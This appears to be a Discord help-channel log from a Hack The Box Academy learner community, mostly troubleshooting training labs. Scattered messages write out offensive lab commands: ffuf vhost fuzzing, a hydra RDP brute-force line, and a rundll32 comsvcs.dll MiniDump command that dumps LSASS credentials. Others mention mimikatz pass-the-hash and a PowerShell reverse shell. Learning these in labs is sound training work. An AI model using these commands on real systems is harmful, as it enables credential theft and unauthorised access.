ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://83.136.249.153:37314/ -H 'Host: FUZZ.83.136.249.153:37314' -fs 900
fathom pendant
#

Utilize the results you receive to modify the filter

edgy gale
#

but he is giving me all the list as result

fathom pendant
edgy gale
#

hmm

fathom pendant
#

inlanefreight.htb from what I recall

#

It tells you above the questions what's needed

edgy gale
#

can u tell me about this..

ocean night
#

Breath marcie.. breath..

fathom pendant
#

It tells you the domain to fuzz against

edgy gale
#

yeah i have read it can u tell me is there any mistake in command that i have write?

fathom pendant
#

Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?

edgy gale
#

i ahve write port with it?

#

this is mistake

fathom pendant
#

Your -H should be -H "host: FUZZ.academy.htb"

edgy gale
#

i have also tried without writing port in -H but no better result.

fathom pendant
#

That's what's wrong with it

edgy gale
#

ok lemme check

fathom pendant
#

See the last example

edgy gale
#

yeah i have tried by putting academy.htb also.

#

lemme check again w8

fathom pendant
fathom pendant
#

That's by far the most common mistake

#

But you can also do http://ip:port as the only thing that truly matters is the host header

edgy gale
#
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:37314/ -H 'Host: FUZZ.academy.htb' -fs 900
#

it is correct now?

fathom pendant
#

Perhaps

#

Did you run it

edgy gale
#

yeah

fathom pendant
#

Then just be patient

edgy gale
#

but it still give me all wordlists leters result as vhost

fathom pendant
#

Use the most common response size for your filter

edgy gale
#

that is 200

fathom pendant
#

Gotta be smarter than the tool you're using

edgy gale
#

i have tried it but still it give me all as result.

fathom pendant
#

That's not the response size btw

#

That's the response code

edgy gale
#

yeah

fathom pendant
#

Response size is listed after size:

edgy gale
#

yeahs that is response code/status

fathom pendant
#

Since -fs filters out by size that's what you use

#

I'm trying to tell you but you're not listening lol

edgy gale
#

oh that maybe a mistake

edgy gale
wraith pelican
edgy gale
#

so what status code mc i have to use.

fathom pendant
#

Size

#

I'm telling you

wraith pelican
fathom pendant
#

Change -fs 900 to another value

edgy gale
fathom pendant
#

Look at your results to find the answer

edgy gale
#

oh i got the result now..

fathom pendant
#

Btw it's referring to the previous section for what filter size you should use and how to determine it

edgy gale
#

Thank u soooo much... i got it.

fathom pendant
#

The Vhost fuzzing section is directly connected to the filtering results lab

edgy gale
#

actually i was thinking if i enter 900 it will filter all 900 range value.

edgy gale
#

btw Thanks mate.
Have a good day

fathom pendant
edgy gale
fathom pendant
#

Not a range

#

Ranges would be x-y where x is the starting value y is the ending value

#

Or a list of values a,b,c,d

#

It helps to actually read the documentation.

#

It also helps to take notes

verbal dagger
#

omg... didn't realize that was the flag for this exercise. i was having trouble running dnscat2 and decided to come here to look. found that flag and thought it was for another part of the module

ocean bronze
#

@fathom pendant

fathom pendant
ocean bronze
#

I want to be a member of hack the box

fathom pendant
ocean bronze
#

Ok

fathom pendant
#

I'm not support nor an on-call helper

#

Trying to fix my sleep schedule atm

ocean bronze
#

@fathom pendant who is leader

#

Creator

fathom pendant
#

You don't need anyone to give you am invite dude

#

Just sign up on the website

#

Unless you mean staff, then you gotta apply for a job

#

<@&861185840277487616>

#

We aren't a hacker for hire server

#

this server is about the hackthebox platform

dapper moth
fathom pendant
#

We don't do hacking brigading or anything like that

#

We don't do that here

stark lark
#

PIVOTING, TUNNELING, AND PORT FORWARDING
RDP and SOCKS Tunneling with SocksOverRDP

For some reason the SocksOverRDP-Plugin.dll gets removed from the victim host after 1 minute... I tried loading it while it was still there but this happened.

dapper moth
#

If anyone can help me out on the Win Lateral Movement module, I'd appreciate.
Been stuck on the same for about 6 hours

fathom pendant
#

Defender might not be on, but real-time protection is separate from that

stark lark
#

I see.. thx

true zenith
#

Hey @upper haven , is it ok to do a check on Client-Side prototype pollution challenge from Whitebox Attacks module? many people are facing a lot of issues to make their payloads work, and i think there are some problems in the challenge... thanks for understanding buddy

fathom pendant
#

The password is the answer to the previous question

#

It's the same setup as the previous questions

#

It also helps to give the module and section name

grand loom
fathom pendant
#

You can likely get it if you connect to it directly

eager ledge
rustic sage
#

United intelligence

ocean bronze
#

U will not understand

rustic sage
#

Can't find you on Google. Also this isn't a place for this. If you wanna hire someone, post a job offer on some platform

ocean night
#

Sorry ZAKORA, can you speak up, or just leave?

fathom pendant
#

Lol

eager ledge
#

Also, I am not able to find the compiled binary for Rubeus. The GhostPack repository just contains the source code in its release page. I found Ghostpack-CompiledBinaries repo but when I try to execute it, I get error:

#

The dot net version in the M* server is v4.0.30319. The repo contains binary for various DotNet versions, but not 4.0.3. I tried all the available versions. They give the same error.

mortal canyon
dapper moth
dapper moth
dapper moth
#

You are welcomed

mortal canyon
eager ledge
stark lark
#

Any way to speed this up?

dapper moth
stark lark
dapper moth
dapper moth
mortal canyon
next bronze
eager ledge
#

@next bronze more hints please

next bronze
#

capture stuff

#

ntlm

eager ledge
#

Done that,

#

But don't get any useful hah from there

next bronze
#

which question again?

eager ledge
#

Crack this user's password hash and submit the cleartext password as your answer.

#

10th question

next bronze
#

yep, capture and crack

eager ledge
#

I have not got any kind of access to DC01 yet

dapper moth
# next bronze you just need to rdp and psremote

Chisel/proxychains isn't working properly on the Pwnbox. I've commented earlier.... It worked fine on a bare metal with VPN though.
I guess I'm stubborn and kept trying with it and to pivot without RDPing into SRV02.
I got Remote PowerShell access in DC01 as 'Helen', but my it was too ephemeral and broken, also the Domain Controller would not auth 'Leonvqz'.
I had to resort to ligolo-ng again to get internal network access....

next bronze
#

you can just double rdp, the creds from the previous sections give you rdp access to both SRV hosts

dapper moth
#

Haven't thought of that. Initial approach was to PtH with the provided NTLM hash

next bronze
dapper moth
#

Thought that since I had PSRemote in SRV02, I could at least execute commands remotely in the DC01.
This that got me a a shell as 'Helen'. Executed a base64 PowerShell reverse shell with Invoke-Command.

mortal canyon
#

Just noticed they give the password in the module saposmoke

#

fml hahahah

next bronze
#

I think the section did mention that

dapper moth
#

Yes.... but since I got only the NTLM hash for the other user, I tried to PtH with mimikatz and execute a reverse shell file, but since it kept breaking, it would not execute or it was opening a bunch of windows in the DC which I would not see nevertheless. 😅

next bronze
eager ledge
#

No

#

Thats the question I am stuck on

#

I know thw username from BloodHound enum

#

But no password

next bronze
#

huh I thought you're stuck on Q10

#

but again the steps are the same, capture on ms01

rustic sage
#

im doing the network services RDP question in the password attacks module, i solved all other questions but im stuck on it... hydra is taking too long and its printing out every attempt, i tried -t 4

eager ledge
next bronze
#

use inveigh

nova ginkgo
#

hello @everyone If I downgrade my subcription to student from platinum , will I get a refund?

#

@fathom pendant do you know that ?

fathom pendant
fathom pendant
nova ginkgo
fathom pendant
#

There is no support on the discord

compact patrolBOT
nova ginkgo
mortal canyon
#

I don't see why you'd get a refund instead of just a downgrade on your next renew
But as marcie said, contacting sup would be a better idea

ocean night
#

There are actual agents in the support chat, they will be coming online soon

fathom pendant
#

Actual human beings answer those questions at times

nova ginkgo
nova ginkgo
fathom pendant
#

How do you know its the "wrong" answer

mortal canyon
#

oh well

fathom pendant
mortal canyon
#

imma try to get a cake recipe from it later then

fathom pendant
#

Support doesn't monitor the discord

nova ginkgo
fathom pendant
#

Then say it didn't help

#

In the chat

mortal canyon
#

did the "talk to a person" button appear to you?

fathom pendant
#

Try clicking that

#

But yeah you should get the option to connect to someone

nova ginkgo
#

I said

fathom pendant
#

Also you can't post images bc your account isn't linked

nova ginkgo
fathom pendant
#

Anyway. Just try again

nova ginkgo
mortal canyon
#

got you, one sec

rustic sage
mortal canyon
nova ginkgo
mortal canyon
#

Idk what yours will say cuz mine is already connected

rustic sage
nova ginkgo
rustic sage
#

yw

fathom pendant
fathom pendant
#

Unless they recently made it do something

mortal canyon
#

oh thats weird

fathom pendant
nova ginkgo
#

.

rustic sage
nova ginkgo
fathom pendant
#

Rdp is a weird one afaik

rustic sage
rustic sage
nova ginkgo
rustic sage
#

u should have a role

mortal canyon
#

Yea maybe you should try the method in #welcome as @fathom pendant said

fathom pendant
# rustic sage ye

And you're using the username and password list from the resources?

rustic sage
#

like me

fathom pendant
#

Hydra should work afaik for it

#

hydra -L username.list -P passwords.list rdp://ip

rustic sage
#

its just taking too long, 1-2 hiurs and im still at sysadmin, which is like at the first 3-7 users or smth

fathom pendant
#

I suggest maybe resetting target/changing vpn region

rustic sage
#

alr

rustic sage
fathom pendant
#

Default rdp is 4 threads

rustic sage
fathom pendant
#

So you don't need to specify

fathom pendant
#

Most if the password tasks should take at most 20 minutes

rustic sage
fathom pendant
#

Yeah that is odd

rustic sage
#

my terminal is filled like that xd

fathom pendant
#

Like I said. Reset target or even change vpn region

rustic sage
#

alr

low girder
#

@nova ginkgo can u plz dm me your registered email address or the username on the HTB Academy platform?

rustic sage
#

ty

grand portal
#

is this really how module should be completed?

#

Would'nt it be effective to take notes right away after each section in module ?

dim wolf
#

it's entirely up to you. what they show is a recommendation that you can choose to follow

stark lark
#

Pivoting module - Skill Assesment
https://academy.hackthebox.com/module/158/section/1441

"In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?"

I found the correct username while listing directories in C:\Users however I don't think that was the right way to do it, and now I'm wondering if I missed out on something. I can't view the hint anymore.

fathom pendant
fathom pendant
#

There's no "incorrect" way

#

And C:\users is one of the first places to explore

stark lark
#

Alright but I don't understand what is meant with "exposes the users credentials and the network as a whole"

#

Where would they else be exposed? SMB?

fathom pendant
#

Perhaps

#

Or in a plaintext file

grand portal
#

we understand jargons.

#

this is not pentest report.

fathom pendant
#

So practicing "dumbing down" the explanation is good practice

#

It also helps cement a general idea of the attack

grand portal
fathom pendant
#

Idk haven't done it

#

But I'm assuming the same reporting concept applies

#

You have the report portion for executives, and the portion for the technical people

grand portal
#

following this, it'll take me around 6 months to complete cpts path-

fathom pendant
#

That's not bad

#

Most people take around that long

grand portal
fathom pendant
#

It just helps with understanding overall as a "can you explain this to someone that doesn't know tech"

gilded radish
fathom pendant
#

The cert doesn't guarantee any type of job

#

No cert or degree does

grand portal
grand portal
fathom pendant
grand portal
fathom pendant
#

Either way. The only way to look bad on your resume is if you make yourself look bad

grand portal
fathom pendant
grand portal
fathom pendant
#

CEH is king in some countries

grand portal
#

it's weird, im prepping for CEH practical exam, while learning through the toughest possible path.

grand portal
fathom pendant
#

But this is not the channel for that convo

#

We're already off topic as it is

grand portal
#

do you want to continue convo anywhere else? im in

fathom pendant
#

Nah

grand portal
#

Alright. is it weird though?

fathom pendant
#

Not a convo for here

steady dust
#

where does evil-win-rm download files if the path is not specified?

next bronze
fathom pendant
#

yeah one of the quirks of evil-winrm is that it requires full path specified

steady dust
#

not really... it downloaded the file in the directory from where it was started

#

i couldn't find the file because i haven't downloaded it

fathom pendant
#

?

#

anyway best practice is to specify the full path always

next bronze
#

you couldn't find the file because you didn't specify the full path ig

desert notch
#

I have a question ! If I'm doing a module that costs 10 cubes and it is written +10 on this module did I get my cubes back + 10 cubes or I just got +10 to have the same number of cubes ?

steady dust
fathom pendant
desert notch
steady dust
#

yes, when you run out of cubes, you have to buy more

fathom pendant
fathom pendant
#

you will always either stay the same (t0 modules); or lose some (the rest only give 20% back)

stark lark
# fathom pendant That's a way to do it

I figured out I'd probably need to do it another way in order to (possibly) obtain the other accounts password. To do that I want to dump lsass and crack it on my attacker VM, but I'm having trouble transferring it.

My best idea was to use SCP since SSH is open - does my syntax look incorrect?

fathom pendant
stark lark
fathom pendant
#

that works too

#

but there's plenty of ways to crack an egg

silk anchor
#

When doing the attacking wordpress using WPscan for brute forcing, Im assuming in the real world there would be some kind of WAF/IP blacklisting to stop this?

vague tundra
#

is it normal this takes this much time? (Password Mutations section of Password Attacks module)

#

the password list I got has like 90k words

gilded radish
#

well yeah

#

I guess

dapper moth
#

It should be faster

vague tundra
#

even at 64 it's slow (2x faster)

gilded radish
#

is it possible to paste smth in pwnbox?

obtuse haven
gilded radish
vague tundra
#

in and out

gilded radish
#

what should I do blaze

#

everything is on in vnc config

next bronze
ocean night
#

You on a Mac by chance Vadimka?

gilded radish
#

no, I use firefox on windows

ocean night
#

But even if.. you can copy text then right click and paste in Pwnbox

vague tundra
#

on chrome

gilded radish
#

it uses it's own clipboard in pwnbox

upbeat oak
#

You should be able to ping the target machine right?

gilded radish
#

doesn't work for me FeelsBadMan

vague tundra
#

maybe make sure this is on

ocean night
stark lark
ocean night
#

Do you see a little clipboard icon in the bottom right @gilded radish ?

#

I'm sure I used to be able to just ctrl+c ctrl+shift+v

obtuse haven
ocean night
#

But I've gotta chuck it in that clipboard now

#

(click clipboard, enter text in to input box, then it is passed to the Pwnbox's clipboard)

stark lark
next bronze
#

it only appears in fullscreen mode

ocean night
#

Ah, I am in Chrome

#

Showed when I expanded to a new tab with the button

#

but didn't need full screen

next bronze
#

yeah it's weird on ff

gilded radish
#

but in full screen

#

o I have that

ocean night
#

Hm, weird

gilded radish
#

but it doesn't work also haha

next bronze
#

it does, paste the stuff you want into the text box, then paste in pwnbox terminal or whatever with ctrl shift v

gilded radish
#

It says it is like middleware, but I still can not paste in smth

#

OOOOOO

#

IT WORKS, OMG finally

#

thank you, guys

vague tundra
#

yeah idk how you lived without that

upbeat oak
#

Hey so I'm running openvpn on my kali machine and am trying to connect to the target machine but nothing is working. It has been like this for about a month now and I've just been completing modules in the pwnbox instance. Is there any way to fix this so I can use my local kali machine?

fathom pendant
fathom pendant
reef frost
upbeat oak
upbeat oak
fathom pendant
#

¯_(ツ)_/¯

fathom pendant
#

also make sure the vpn is set to only use resources on its own network in the network manager settings

fathom pendant
#

Google i cba to find the link rn

obtuse haven
upbeat oak
#

Wow

lean aspen
#

Hello, any tip for the OTP part on the skills assesment for Broken Authentication.

acoustic owl
#

What have you already tried?

lean aspen
#

I have no clue, I just randomly followed the steps that there's on the module OTP

acoustic owl
#

Take another close look at the module.

lean aspen
#

ok

primal harbor
#

i enter my university email but it give Unverified

primal harbor
acoustic owl
fathom pendant
fathom pendant
#

you just have to be patient as said, it takes a few days for HTB to verify and cross-check the info

#

no, i'm not staff -- this is an issue to do with support, which you contacted

#

so be patient

#

you'll be notified via email when it's processed

acoustic owl
cedar marsh
#

Footprinting module SMTP:
Q-> Find username that exist on server.
as you can see root and mysql are the users that are present in the smtp server, I tried both, not working.
I got mysql from enumerating

#

on looking at forums people advised to use the wordlist provided in resources. But idk I can't access resources when pressing it nothing happens, it doesn't download the pdf

acoustic owl
cedar marsh
#

yes and it is not downloading

verbal dagger
#

On the pivoting module using dnscat2, I got an error when starting the server saying it couldn't load the file. Went to use the bathroom, ran the same command and it worked for some reason. Not sure if this comment would help someone else, but I thought I'd write it in case it does.

upper haven
vague tundra
#

In Password Attacks module, Attacking LSASS, this commnd isn't doing anything

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 652 C:\lsass.dmp full
next bronze
vague tundra
sonic plume
#

can i get a little nudge here or in dm's for "footprinting medium lab"?

i found 2 creds so far, || alex, sa || tried with these users & password to smb, evil-winrm, 3389 but none of these gives me a "next step" what should i do rn?

wide river
sonic plume
ruby creek
#

Anyone having issues spawning targets in modules?

#

VPN change fixed, nvm - carry on

minor dome
#

What http server software is the question (without the version), and it says Apache. But thats wrong... Am I looking at the wrong thing?

shut vapor
minor dome
#

Information Gathering - Web Edition (Skills Assessment)

wraith pelican
shut vapor
#

I'll see if I can fire up that section and give you a clearer hint unless qui3t's answer works (I don't believe it is right).

wraith pelican
shut vapor
#

Oooh, good catch there. Yeah that's part of it.

minor dome
wraith pelican
# minor dome When I use that it said it couldnt resolve the host

you need to update you /etc/hosts file. A .htb domain is not public, it cannot be resolved by public DNS server so you have to tell whataver tool you are using where to look. Either by specifying the ip in your host file or by specifying a resolver in the command

#

That skill assessment is tricky, try to understand how the thing is actually working

minor dome
lime magnet
#

Hello guys, I just had a question (please excuse me if this isn’t the right channel ) I don’t have a windows machine, it’s important for a hacker to know both Linux as well as windows, I’m pretty good at Linux, but is there any way I could practice or learn windows?

wraith pelican
shut vapor
#

Wow, they totally changed that info gathering - web module... that stupid question used to be about imgur.com

wraith pelican
shut vapor
#

Is the integrated terminal new? I hadn't seen that before & that's a super-cool way to use the pwnbox!

young wyvern
#

Hello!

I am on the Login Brute Forcing module, Service Authentication Attacks section, part 2 Service Authentication Brute Forcing.

When trying to connect or brute force via SSH I get told that it only uses public key authentication, not password authentication, which obviously I’m supposed to find the password to login so I am very lost.

#

Oh did the help section get moved?

zenith vale
#

hey guys im doing the sqlmap skill assessment again and i know where to find the injectable point is, but the thing is. i cant create it like a bug in the machine

#

ive tried to reset it a few times

#

can someone talk to me in private maybe im missing something

#

never mind

rustic sage
#

I need some help, accordingly network is unreachable meaning my metasploit attack wont work

fathom pendant
#

Change vpn regions, reset target, any basic troubleshooting done?

rustic sage
wraith pelican
#

maybe the space between /p: and the password string ?

north bramble
#

I am now getting this error. I reset the machine twice

fathom pendant
#

You have a space between/p: and the password

#

Also spoiler for a skill assessment

north bramble
north bramble
north bramble
fathom pendant
#

Logon failure means your creds are bad

#

The error states "status logon failure"

north bramble
fathom pendant
#

¯_(ツ)_/¯

gleaming thistle
#

Can someone help me with the skills assessment of Windows Event LOG & Finding evil? I just need a hint, I just dont want to text here because its a bit crowded

zenith vale
#

@fathom pendant could u help me please , im doing the identifying the ssr and port, but im tryna access it either via curl or burp with no success, tried to use gopher prior but didnt work either

wraith pelican
# north bramble I am now getting this error

can't verify your password, and i don't have note about the rdp command. But i googled your error, what about if you specify the domain xfreerdp /d:DOMAIN /u:USER then the rest of the command

north bramble
young wyvern
north bramble
#

lmao it started to work now

#

working now thanks

wraith pelican
fathom pendant
#

I'm not some magic wizard that has all the answers

north bramble
wraith pelican
#

lol ok then

#

you are good to go

north bramble
fathom pendant
zenith vale
#

oh

torn minnow
#

Can anyone send me an Instagram or WhatsApp link or a hacking link?

fathom pendant
fathom pendant
#

And further read #welcome to see what this server is about

#

If you wanna learn ethical hacking and not skid shit about hacking insta/telegram